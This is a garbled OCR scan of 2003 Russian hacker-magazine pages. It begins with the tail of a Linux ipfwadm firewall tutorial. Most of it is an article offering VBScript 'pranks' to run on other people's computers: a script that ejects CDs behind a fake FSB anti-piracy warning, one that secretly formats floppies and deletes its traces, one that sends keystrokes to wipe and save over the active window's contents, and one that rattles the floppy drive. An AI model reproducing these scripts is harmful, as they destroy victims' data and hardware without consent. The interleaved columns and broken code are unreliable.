/sbin/ipfwadm -B -P tcp -a deny -S 255.255.255.255/0 -D ${LOCALNET}/24 5000:64575 #номера портов #Больше блокировать порты не будем -

остались открытыми порты с 1025 по 4999. Это необходимо для работы юзеров: инет, ася, ирка.

#Дальше пошла настройка гейта в Инет: GateWayIP=195.161.26.87/32

#Реальный IP сервака /sbin/ipfwadm -B -P tcp -a deny -S

255.255.255.255/0 -D ${GateWayIP} 24:79

# è 80 - âåá

/sbin/ipfwadm -B -P tcp -a deny -S 255.255.255.255/0 -D ${GateWayIP} 0:20

# оставить открытыми порты 21-23 - ftp

hang

NOW!

BUY

w Click

# не дадим Инета плохим людям, у кото-

рых IP попадает в промежуток от 25 до 30.

-x cha

Последняя цифра показывает количество

обломанных юзеров.

/sbin/ipfwadm -B -a deny -S

255.255.255.255/0 -D ${NET}.25/5

КАК ЭТО БЫВАЕТ ПО ЖИЗНИ

А сейчас я расскажу, как было в ре-

альной жизни. Была маленькая се-

точка из 25 компов (подъезд + ма-

ленькая фирма) и была эта сеть

изолирована от Инета, и не было ни

у кого проблем с безопасностью, но

решили на общем собрании юзеры

инет заиметь. Решили и сделали.

Еще был один умный чувак, сказав-

ший, что нам надо поставить гейта

между всем Инетом и маленьким

мирком локалки. Воздвигли мы объ-

единенными усилиями мозгов и пи-

ва гейт на базе четверки, и стала се-

точка наша защищена от внешнего

вторжения фаерволлом, кэширую-

щий прокси существенно экономил

входящий траф: за месяц экономия

составила около 50-150 мегов, то

есть на пиво с бубликом админам

хватало. И еще один бонус: так как

мы юзаем только один IP из сети

провайдера, то договорились на

абонентскую плату в 500 рублей +

пиво, а должны были 25*100=2500

рублей. А что до тормозов, то маши-

на справлялась, даже когда все 25

юзеров выходили в Инет разом,

правда, канал не резиновый, и

пришлось мне чуток схитрить: пос-

тавить на свой IP приоритет повы-

ше, чтобы в Инете без тормозов си-

деть, но это другая история. Вот так.

Надеюсь, ты понял, что во всех от-

ношениях установка компа на гра-

нице сетей - очень хороший ход.

Вот так все просто и круто. Убедил-

ся, что сила не в гигагерцах, а в пря-

мых руках и Линухе? Так можно сде-

лать очень много. Удачи тебе в нелег-

ком труде начинающего сисадмина.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D									r
P						NOW!				o
P

					HOWTO/ВОЗВРАЩЕНИЕ БЛОКНОТА
w Click				to	BUY
w Click											m
w								ВОЗВРАЩЕНИЕ
	w									o
	.								.c
		p					g
			df			n		e
				-xcha
								БЛОКНОТА

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ÎÑè 4work

ГОТОВИМ ЗАПАДЛО НА СКРИПТАХ

Анализирующий	Привет, великий западлостроитель. Я надеюсь, от тебя не отвернулись еще твои
(analyst1945@mail.ru)	друзья-компьютерщики (а других у тебя быть не может - вам просто не о чем
	разговаривать), тебя не выгоняют из компьютерных клубов, а на работе злой админ
	не запретил запуск любимого Блокнота. Тогда появился реальный шанс припомнить
	былые обиды и попрактиковаться в любимом хобби - западлостроении. Об этом я тебе
	расскажу в сегодняшней статье.

Предлагаемый код в компиляции не нуждается и пишется в любом текстовом редакторе.

Âкратце напомню, что весь предлагаемый далее код в компиля-

ции не нуждается и пишется в любом текстовом редакторе (лишь бы формат выходного файла был текстовый.), сохраняется в текстовом файле с расширением WSF и запускается так же, как и ЕХЕ-файлы. Не забудь добавлять обязательные XML элементы:

<?xml version=”1.0” encoding=”ISO-8859-1”?>
<job id=”T1”>
<script language=”VBScript”>
<![CDATA[
в начало файла и
]]>
]]>		Microsoft Script Encoder обладает обширной справочной службой
</script>			‘Подключение системных объектов
</job>	ратской копией. Мы же с тобой зай-		‘Подключение системных объектов
	мемся тем, что будем при попытке		Do while f=0
в конец файла соответственно.	использования такого диска извле-		‘Создается бесконечный цикл
Итак, приступим.	кать его с выдачей ну оч-ч-ч-ень		‘для работы скрипта до перезагрузки
	строгого предупреждения :). Делать		WScript.sleep 5000
БОРЬБА С ПИРАТСТВОМ	это будем, конечно же, с помощью		‘Пауза между проверками наличия диска в
Скажи, где ты брал диск с дистрибу-	сценариев на языке VBScript. Итак,		дисководе в миллисекундах
тивом твоей ОСи? А за сколько?	пиши следующий код:		Count=-1
Что-что? ЛИЦЕНЗИОННАЯ?! И все			‘Начальное положение счетчика
остальные диски ТОЖЕ? Ну, тогда	Option Explicit		‘Нужен на случай нескольких сидюков
бросай журнал и иди кататься с де-	Dim fso,mplayer		For Each Drive in FSO.Drives
вочками (мальчиками :)) на яхте.	Dim Drive		‘Проверка всех дисков компа
Это будет для тебя более полезным	Dim Count, f		If Drive.DriveType=4 then
занятием. Реально же, по офици-	f=0		‘Если это сидюк
альным данным, пиратский рынок в	‘Объявляются используемые переменные		count=count+1
России составляет 89 процентов. То	On Error Resume Next		‘То увеличиваем счетчик
есть с вероятностью 1:10 можно ут-	‘Блокировка сообщений об ошибках		if Drive.IsReady Then
верждать, что вставленная в диско-	set fso=CreateObject		‘Если он вставлен
вод компашка, если это не		(“Scripting.FileSystemObject”)	If (fso.fileexists(Drive.DriveLetter & “:\” &
собственный сборник, является пи-	set mplayer=CreateObject(“WMPlayer.OCX.7”)		“Autorun.inf”)) then
			‘È íà íåì åñòü ôàéë Autorun.inf
			‘Значит есть автозапуск
			‘И это не ручной сборник
			‘(кто ставит на ручной сборник автоза-
			ïóñê? %))
			‘И не музыкальный диск
			mplayer.cdromcollection.item(count).eject()
			‘Извлекается лоток
			msgbox “Обнаружена пиратская копия дис-
			ка. Дальнейшая работа с диском невоз-
			можна.” &_
Так выглядит предупреждение пользователя			vbcrlf & “Сообщите в местные органы ФСБ


page	046	08(33) 2003

hang

NOW!

HOWTO/ВОЗВРАЩЕНИЕ БЛОКНОТА

w Click

BUY

w Click

BUY

о месте его покупки.”,48,_

H O W T

-xcha

“Антипиратская система Windows”

Кодировка специальных клавиш

-x cha

‘И выдается грозное предупреждение

в методе SendKeys

End if

End If

Esc

{ESC}

Page Up

{PGUP}

Tab

{TAB}

Delete

{DEL}

Loop

Caps Lock

{CAPSLOCK}

End

{END}

Backspace

{BS}, {BKSP} èëè

Можешь не сомневаться, что твой

Page Down

{PGDN}

{BACKSPACE}

ламернутый друган или не менее

Стрелка влево

{LEFT}

ÎÑè

Enter

{ENTER} èëè ~

ламернутая секретарша будут рас-

Стрелка вправо {RIGHT}

{PRTSC}

сказывать об этой “защите” всем и

Стрелка вверх

{UP}

4work

Scroll Lock

{SCROLLLOCK}

каждому, а первым делом побегут в

Стрелка вниз

{DOWN}

Break

{BREAK}

магазин, продавший этот диск, а

{F1}

Insert

{INS} èëè

может и в ФСБ позвонят ;).

F12

{F12}

При желании можешь усовершен-

{INSERT}

Space

chr(32)

ствовать этот скрипт. Например,

Home

{HOME}

можно считать количество попыток

On Error Resume Next

‘Причем в скрытом режиме

использования диска и каждый раз

выдавать новое предупреждение. В

‘Блокировка сообщений об ошибках

End if

общем, пофантазируй.

set WshShell=WScript.CreateObject

End if

(“WScript.Shell”)

‘Заново повторяется вся процедура

ИЗДЕВАЕМСЯ НАД FDD

Set fso = CreateObject

Loop

Можешь не

И ЕГО ХОЗЯИНОМ

(“Scripting.FileSystemObject”)

сомневаться,

÷òî òâîé ëà-

С оптическими дисками разобра-

‘Подключаются системные объекты

Эта фича будет работать при ус-

мернутый дру-

лись, но остались дискеты. Что

Do While x=0

ловиях:

ган будет рас-

можно делать с дискетами? Извле-

‘Создается бесконечный цикл

1. Дискета не защищена от запи-

сказывать об

этой “защите”

кать не получится по причине отсу-

‘для работы скрипта до перезагрузки

ñè.

всем и каждо-

тствия какой либо связи данной ме-

Wscript.sleep 10000

2. В “Свойствах папки” - “Вид” -

му, а первым

делом побежит

ханической части с электроникой.

‘Пауза между проверками наличия диска

отмечена опция “Выводить полный

в магазин,

Остается логическая составляю-

в дисководе в миллисекундах

путь в строке заголовка”.

продавший

åìó ýòîò äèñê.

щая. Самым оптимальным вариан-

If WshShell.AppActivate(“A:”) then

3. Окно проводника с содержимым

А может и в

том мне представляется формати-

‘Если юзер открыл окно дискеты

дискеты открыто, пусть даже в

ФСБ позвонит.

рование, причем скрытое. Открыл

‘Значит он вставил ее в дисковод

так чел документ с дискетки, рабо-

Set flopp = fso.GetDrive(“A”)

тает потихоньку, глянь - а файлов-

‘Получаем доступ к флоппу

то и нет! Только осторожно: воз-

If flopp.IsReady and flopp.FreeSpace <>

можны приступы вандализма, чле-

flopp.TotalSize then

новредительство :), громкие раз-

‘Если он не чистый

мышления на тему вирусов, виру-

‘То создается файл с ответами

сописателей и интимной жизни их

Set txtcom = fso.opentextfile(command-

родственников.

file,2,true)

Приступим.

txtcom.writeline

txtcom.writeline “y”

Консоль Windows XP с успехом

Option Explicit

txtcom.close

выполняет многие команды MS-DOS

Dim WshShell, fso,flopp, odrive

‘и пакетный файл с командой форматиро-

Dim commandfile, batfile, txtcom, txtbat

вания

Dim disklabel, x

‘и заметания следов

свернутом виде, как минимум 10 се-

‘Объявляем используемые переменные

Set txtbat = fso.opentextfile(batfile,2,true)

кунд. Если интервал не устраивает,

commandfile=”c:\LOG.LOG”

txtbat.writeline “format a: /q /v:” & disklabel

измени строку

‘Имя файла с командами, передаваемыми

& “ < “ & commandfile

Wscript.sleep 10000

программе форматирования

txtbat.writeline “del “ & commandfile

например, на

Дискета фор-

batfile=”c:\file.bat”

txtbat.writeline “del “ & batfile

Wscript.sleep 5000

матируется

‘Имя запускаемого файла

txtbat.close

4. Корень диска С не защищен от

äàæå ïðè îòê-

рытых на ней

disklabel=”Loh”

WshShell.run batfile,0

записи (бывает и такое). В против-

файлах.

‘Метка для форматируемого диска

‘Теперь полученная парочка принимается

ном случае замени имена (располо-

x=0

за работу

жение) файлов c:\LOG.LOG и

c:\file.bat на другие. В принципе,

имена и расширения могут быть

H O W T O

Коды для комбинаций клавиш

любыми.

в методе SendKeys

5. Данному пользователю разре-

шено форматировать дискеты

(Windows 2k/XP).

Shift

+ перед кодом второй клавиши

6. Если террор производится на

компе под управлением Windows

Ctrl

^ перед кодом второй клавиши

XP, то дискета форматируется даже

Alt

% перед кодом второй клавиши

при открытых на ней файлах. Если

Вывод повторяющихся клавиш {код_клавиши число_повторов}

же используется Винда из серии

ПРИМЕРЫ:

9х/МЕ, то нужно заменить строку

txtcom.writeline “y”

{^x}

Нажатие комбинации клавиш CTRL+X

íà

{+(ec)}

Одновременное нажатие SHFT+E+C

txtcom.writeline “n”

{H 10}

10 нажатий клавиши H


08(33) 2003	page	047

hang

HOWTO/NOW! ВОЗВРАЩЕНИЕ БЛОКНОТА

NOW!

w Click

BUY

w Click

BUY

CTRL+A, SHIFT+DEL, ENTER. Ýòî

H O W T O

-xcha

Параметры командной строки программы

приведет к соответствующим ре-

-x cha

screnc.exe

зультатам: удалению файлов и па-

пок, текстов (смотря какое окно бы-

ло на первом плане), выскакива-

Работа программы без вывода сообщений на экран

нию глаз из орбит, порче матери-

Перезаписать исходный файл зашифрованным под тем же

альных ценностей, биению головой

самым именем

о стену, массовым явлениям суици-

/l language

Явно указывает язык в шифруемом файле.

да и другим подобным веселеньким

4work

Например /l Jscript

(кому как :)) вещам. А поможет нам

Примеры:

в этом этот скриптик:

screnc hello.vbs hello.vbe

Option Explicit

screnc /e htm config.wsf confighide.wsf

ÎÑè

Dim WshShell

screnc /f /e htm index.html

Dim f, x

f=0

Форматирование будет отложено

издает громкие звуки. Для разно-

‘Объявляются используемые переменные

до закрытия файлов.

образия, так сказать.

On Error Resume Next

Краткое пояснение принципа

‘Блокировка сообщений об ошибках

действия сценария. Как известно, в

Option explicit

Set WshShell=

системе MS-DOS вывод на экран

Dim fso, odrive

WScript.CreateObject(“WScript.Shell”)

можно перенаправить в текстовый

Dim x, y, z

‘Подключаются системные объекты

файл, указав после команды сим-

y=500

Do While f=0

вол “>” в режиме нового файла или

‘y - Приблизительная длительность тарах-

‘Создается бесконечный цикл

Возможны

“>>” в режиме добавления к имею-

тения флоппаря

‘для работы скрипта до перезагрузки

щемуся файлу и имя получаемого

Set fso =

Wscript.Sleep Int((1800000)*Rnd)

приступы ван-

файла. Например, командой “dir

CreateObject(“Scripting.FileSystemObject”)

WshShell.SendKeys “^{a}”

дализма, чле-

новредитель-

c:\windows > c:\1.txt” будет получен

set odrive = fso.getdrive(“a:\”)

‘Посылается комбинация клавиш CTRL+A

ство, громкие

файл C:\1.txt, содержащий листинг

‘Подключаются системные объекты

WshShell.SendKeys “+{DEL}”

размышления

íà òåìó âèðó-

файлов и папок каталога C:\win-

for x=1 to y

‘Посылается комбинация клавиш

сов, вирусопи-

dows. Но далеко не всем известно,

‘Процесс пошел

SHIFT+DEL

сателей и ин-

что возможно обратное перенап-

if odrive.isready then

WshShell.SendKeys “{ENTER}”

тимной жизни

их родствен-

равление с использованием симво-

‘Проверяется наличие дискеты

‘Посылается клавиша ENTER

ников.

ла “<”. На этом принципе и основан

‘Отсюда и происходит весь шум

‘т.е. сейчас было удалено содержание ак-

данный скрипт. В текстовый файл

z=1

тивного окна

заносятся предполагаемые нажа-

‘Фиктивная операция

‘конечно, если это возможно

тия на клавиатуру, а затем они счи-

‘Не ради этого все затевалось

WshShell.SendKeys “^{s}”

тываются программой Format. В

end if

‘Посылается комбинация клавиш CTRL+S

итоге все действия происходят без

‘Завершаем микроцикл

‘Если это текстовый редактор,

участия пользователя, что нам и

‘то “результат” был сохранен

требовалось. Ну а консоль Windows

‘Поехали по кругу

WshShell.SendKeys “{ENTER}”

XP с успехом выполняет эти функ-

‘Посылается клавиша ENTER

öèè MS-DOS.

Скрипт будет работать, если: на

WshShell.SendKeys “{LEFT}”

Что же делать, если дискета не

компе есть дисковод, он висит на

‘Посылается клавиша “Стрелка влево”

вставлена? Неужели лишать себя

букве А и в нем нет дискеты.

WshShell.SendKeys “{ENTER}”

законного удовольствия? Не стоит.

Конечно, при желании эту штучку

‘Посылается клавиша ENTER

Пусть дисковод в знак возмущения

можно облагородить, а именно: до-

На случай, если документ создан впервые

бавить определение наличия дис-

WshShell.SendKeys “%{F4}”

ковода, его букву и присутствие в

‘Посылается комбинация клавиш ALT+F4

нем дискеты, включать трещалку

‘Окно закрывается, чтобы было нельзя

через определенные или случай-

сделать откат

ные промежутки времени, заста-

Loop

На случай, ес-

вить дисковод наигрывать опреде-

‘Заново повторяется вся процедура

ленную мелодию. И имей в виду,

ли владелец

Данный алгоритм не претендует

компа добрал-

что этим приколом реально угро-

ся до твоих

áèòü FDD.

на универсальность, но ты можешь

скриптов, ты

переделать его под конкретную си-

можешь изба-

âèòü åãî îò

ЗАВЕТНЫЕ КНОПОЧКИ

туацию. Так что делайте резервные

удовольствия

А теперь приступим к термоядерно-

копии, господа.

читать их ис-

ходники.

му межгалактическому терроризму

в рамках отдельно взятого писюка.

ЗАЩИТА ОТ УМНЫХ

Будем периодически посылать с

Осталось решить главную задачу:

клавиатуры разрушительную ком-

сделать так, чтобы все это (ну не все

Была куча музыки

бинации клавиш подобно этой:

- половина :)) запускалось при вклю-

H O W T O

Книги, посвященные созданию скриптов:

Попов А. Windows Script Host для

ный справочник. - Санкт-Петер-

Windows 2000/XP. - Санкт-Петер-

бург.: Питер. 2002

áóðã.: BHV-CÏá. 2003

С. Палмер. VBScript и ActiveX:

Джесси Торрес. Скрипты для ад-

библиотека программиста. - Санкт-

А теперь ее нету. И корзина пустая

министратора Windows. Специаль-

Петербург.: Питер. 1999


page	048	08(33) 2003

<<< < Предыдущая 1 2 3 45 / 125 6 7 8 9 10 11 12 > Следующая >>>

Соседние файлы в папке специальные выпуски

#
20.04.202413.68 Mб17Специальный выпуск 28_Optimized.pdf
#
20.04.202414.61 Mб16Специальный выпуск 29_Optimized.pdf
#
20.04.202411.82 Mб16Специальный выпуск 30_Optimized.pdf
#
20.04.202411.84 Mб16Специальный выпуск 31_Optimized.pdf
#
20.04.202411.87 Mб15Специальный выпуск 32_Optimized.pdf
#
20.04.202411.69 Mб15Специальный выпуск 33_Optimized.pdf
#
20.04.202411.64 Mб16Специальный выпуск 34_Optimized.pdf
#
20.04.202412.09 Mб15Специальный выпуск 35_Optimized.pdf
#
20.04.202414.14 Mб15Специальный выпуск 36_Optimized.pdf
#
20.04.202413.53 Mб16Специальный выпуск 37_Optimized.pdf
#
20.04.202412.58 Mб15Специальный выпуск 38_Optimized.pdf